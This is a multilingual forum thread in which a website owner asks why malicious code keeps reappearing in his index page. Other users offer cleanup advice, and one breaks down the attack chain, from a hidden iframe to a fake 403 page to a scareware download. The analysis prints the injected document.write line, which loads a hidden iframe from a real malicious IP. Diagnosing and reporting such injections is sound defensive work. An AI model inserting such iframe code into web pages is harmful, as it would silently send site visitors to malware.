kardes index lerime yukardaki kod giriyor virüs ziyaretcilerimi kaçiriyor ben bu kodu siliyorum
Chmod 444 yapiyorum dana sonra bakmiyorum kod yine girmis chmod 654 olmus bunu baska yere
sordugumda host firmasindan kaynaklaniyor dediler
er hat ein problem in seiner index seite und meint dass er den code löscht den verzeichnis auf 444 setzt und dann aufeinmal der code wieder da ist. kann man da was machen miro?
@DNA: ben mirodan sorushdum ki o codu ordan poza biler yoksa yox, bekle o senin index fajli pozar ve sen yeniden onu yükleyersen amma o codsuz.
EDIT:
Ola bilir sende computerinde o trojan yayilmish, ona göre komputeri virusa garshi yokla. bütün hamisi silinenden sonra ftpye gir ve onu birdaha poz
Das tut jetzt zwar nichts zur Sache, aber ich hab ein bisschen analysiert, was dieser Code macht:
1.d.write('<IFRAME name=O1 src=\'http://77.221.133.171/.if/go.html?'+Math.round(Math.random()*1233)+'e8d611\' width=3 height=411 style=\'display: none\'></IFRAME >');das ergibt z.B. folgenden Code:<IFRAME name=O1 src='http://77.221.133.171/.if/go.html?1229e8d611' width=3 height=411 style='display: none'></IFRAME >
2.
Die Seite in den IFrame ist eine gefakte 403er Seite, die ein neuen IFrame öffnet.[code]
403 Forbidden
Forbidden
You don't have permission to access /.if/go.html on this server.
[/code]Dieses IFrame lädt sie Seite [nolink://77.221.133.171/.dif/go.php?sid=1](nolink://77.221.133.171/.dif/go.php?sid=1)
3.
Auf nolink://77.221.133.171/.dif/go.php?sid=1 bekommt man dann diese nette Meldung:[quote]ATTENTION! You have not completed the virus scan!
Your PC is still infected with spyware!
Please return to advancedxpdefender.com and download Advanced XP Defender scanner.[/quote]
Dann startet ein „Scan“, der bei mir gleich ein Paar infizierte .exe Dateien findet (ich nutze Linux )
4.
Zuletzt wird man genötigt sich ein Setup runterzuladen, um die (warscheinlich mit Magischen Kräften) ermittelten Viren zu entfernen. Das Setup ist mit not-virus:Hoax.Win32.Renos.czu verseucht
PS: Die Seite wird nach jedem neu laden in einem neuen Design angezeigt, die zugegeben nicht mal so schlecht aussehen.
PPS: Wenn jemand Zeit hat kann er die IP 77.221.133.171 an abuse@infobox.ru melden